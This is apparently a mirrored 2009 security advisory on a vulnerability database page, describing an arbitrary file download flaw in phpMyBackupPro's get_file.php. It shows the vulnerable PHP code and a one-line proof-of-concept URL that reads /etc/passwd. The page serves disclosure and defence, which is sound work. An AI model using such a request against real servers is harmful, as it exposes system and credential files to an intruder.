Lucene search
K

Arbitrary File Download in phpMyBackupPro

🗓️ 16 Nov 2009 00:00:00Reported by Amol NaikType 
zdt
 zdt
🔗 0day.today👁 20 Views

Arbitrary File Download in phpMyBackupPro vulnerability in get_file.php allows arbitrary file downloa

Code
=========================================
Arbitrary File Download in phpMyBackupPro
=========================================

################################################################################
    Arbitrary File Download in phpMyBackupPro
 
    Name            Arbitrary File Download in phpMyBackupPro
    Systems Affected    phpMyBackupPro v 2.1 and possibly earlier versions
    site            http://www.phpmybackuppro.net
################################################################################
 
 
############
1. OVERVIEW
############
 
phpMyBackupPro is a web-based MySQL backup application in PHP.
You can schedule backups, download, email or upload them with FTP and backup whole file directories.
Zip and gzip compression, easy interface and installation. Many languages and online help!
 
###############
2. DESCRIPTION
###############
 
phpMyBackupPro is vulnerable to Arbitrary File Download.
 
######################
3. TECHNICAL DETAILS
######################
 
Arbritrary File Downlaod
++++++++++++++++++++++++
 
Vulnerable page     get_file.php
Vulnerable Parameters   view
Vulnerable Code    
 
---------------------------------------------------------------------------------------
 
// show the requested file
if (isset($_GET['view']) && file_exists($_GET['view'])) {
    if (isset($_GET['download'])) {
        header("Content-Type: application/octet-stream");
        header("Content-Disposition: attachment; filename=".basename($_GET['view']));
        readfile($_GET['view']);
    } else {
        ......
        ......
        .......
    }
 
---------------------------------------------------------------------------------------
 
The parameter "view" is not properly sanitized which results in Arbitrary file download.
 
++++
POC
++++
 
http://localhost/phpMyBackupPro/get_file.php?download=true&view=/etc/passwd
 
 
 
############
4. TimeLine
############
 
20th Oct 2009       Bug Discovered
20th Oct 2009       Reported to Vendor
27th Oct 2009       vendor agreed to the vulnerablity and ready to fix it.
16th Nov 2009       No communication received about the status of the fix.
16th Nov 2009       Public Disclosure


#  0day.today [2018-04-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Nov 2009 00:00Current
7.1High risk
Vulners AI Score7.1
20